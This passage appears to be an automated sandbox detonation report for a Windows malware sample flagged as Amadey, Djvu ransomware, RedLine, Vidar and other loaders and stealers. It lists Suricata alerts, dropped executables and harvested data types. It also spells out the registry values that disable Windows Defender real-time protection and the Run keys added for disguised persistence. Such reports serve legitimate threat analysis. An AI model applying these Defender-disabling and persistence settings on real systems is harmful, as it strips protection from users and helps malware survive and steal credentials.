memory/2716-240-0x00000000003C0000-0x00000000003FA000-memory.dmp

memory/2716-243-0x0000000000400000-0x0000000000A93000-memory.dmp

memory/2896-244-0x00000000011A0000-0x00000000011AE000-memory.dmp

memory/2956-245-0x0000000000000000-mapping.dmp

memory/2336-247-0x0000000001390000-0x00000000013E9000-memory.dmp

memory/2336-248-0x0000000000100000-0x0000000000159000-memory.dmp

memory/2992-249-0x0000000000000000-mapping.dmp

memory/3004-250-0x0000000000000000-mapping.dmp

memory/1440-253-0x0000000003EE0000-0x0000000004163000-memory.dmp

memory/364-254-0x0000000000C91000-0x0000000000CBC000-memory.dmp

memory/1460-255-0x0000000000000000-mapping.dmp

memory/2716-257-0x0000000000240000-0x0000000000340000-memory.dmp

memory/1068-258-0x0000000000130000-0x00000000002F0000-memory.dmp

memory/1068-259-0x0000000004950000-0x00000000049DE000-memory.dmp

memory/1068-260-0x0000000000BE0000-0x0000000000C2C000-memory.dmp

memory/568-261-0x0000000000000000-mapping.dmp

memory/1060-263-0x0000000000BC0000-0x0000000000D5D000-memory.dmp

memory/568-264-0x0000000068F20000-0x00000000694CB000-memory.dmp

memory/1060-265-0x00000000009F0000-0x0000000000BE2000-memory.dmp

memory/568-266-0x0000000068F20000-0x00000000694CB000-memory.dmp

memory/2716-267-0x0000000000240000-0x0000000000340000-memory.dmp

memory/2716-268-0x0000000000400000-0x0000000000A93000-memory.dmp

memory/1060-269-0x00000000009F0000-0x0000000000BE2000-memory.dmp

memory/364-270-0x0000000000C91000-0x0000000000CBC000-memory.dmp

memory/364-271-0x0000000000400000-0x0000000000A93000-memory.dmp

memory/1088-272-0x0000000000400000-0x0000000000885000-memory.dmp

memory/1900-273-0x0000000000400000-0x0000000000C96000-memory.dmp

memory/2172-274-0x0000000000400000-0x0000000000C96000-memory.dmp

memory/2000-275-0x0000000000321000-0x000000000034E000-memory.dmp

memory/2320-278-0x0000000000000000-mapping.dmp

memory/2728-279-0x0000000000000000-mapping.dmp

memory/2264-282-0x0000000000000000-mapping.dmp

memory/2964-287-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2964-288-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2964-290-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2964-291-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2964-292-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2964-293-0x000000000041824E-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-07-05 10:59

Reported

2022-07-05 11:07

Platform

win10v2004-20220414-en

Max time kernel

450s

Max time network

453s

Command Line

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

Signatures

Amadey

trojan amadey

Colibri Loader

loader colibri

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" N/A N/A

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" N/A N/A

PrivateLoader

loader privateloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

Vidar

stealer vidar

suricata: ET MALWARE Amadey CnC Check-In

suricata

suricata: ET MALWARE Generic gate .php GET with minimal headers

suricata

suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

suricata

suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

suricata

suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

suricata

suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved

suricata

suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer

suricata

suricata: ET MALWARE Win32/Colibri Loader Activity

suricata

suricata: ET MALWARE Win32/Colibri Loader Activity M2

suricata

suricata: ET MALWARE Win32/Colibri Loader Activity M3

suricata

suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download

suricata

suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key

suricata

suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

suricata

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

suricata

suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload

suricata

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\RunDll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe N/A
N/A N/A C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\M52CB.exe N/A
N/A N/A C:\Windows\system32\RunDll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0BB4J.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0BB4J.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EH46E.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe N/A
N/A N/A C:\ProgramData\50543188494393494002.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSDD85.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3A8A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4A1B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4A1B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4A1B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4A1B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6DF1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe N/A
N/A N/A C:\Users\Admin\AppVerif\DllHelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7BCD.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\ProgramData\50543188494393494002.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6DF1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\EH46E.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7BCD.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4A1B.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3A8A.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4A1B.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\rundll32.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" C:\Users\Admin\AppData\Local\Temp\0BB4J.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wzocvkk = "\"C:\\Users\\Admin\\AppData\\Roaming\\Okjeqdz\\Wzocvkk.exe\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\signed.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Driver Service = "C:\\ProgramData\\MsDrvSrvc.exe" C:\Users\Admin\AppData\Local\Temp\signed.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\72bf7303-5dc0-44e9-87d8-698f8677acab\\kdnmdIr2m3Z75rmoxMQY45zR.exe\" --AutoStart" C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A
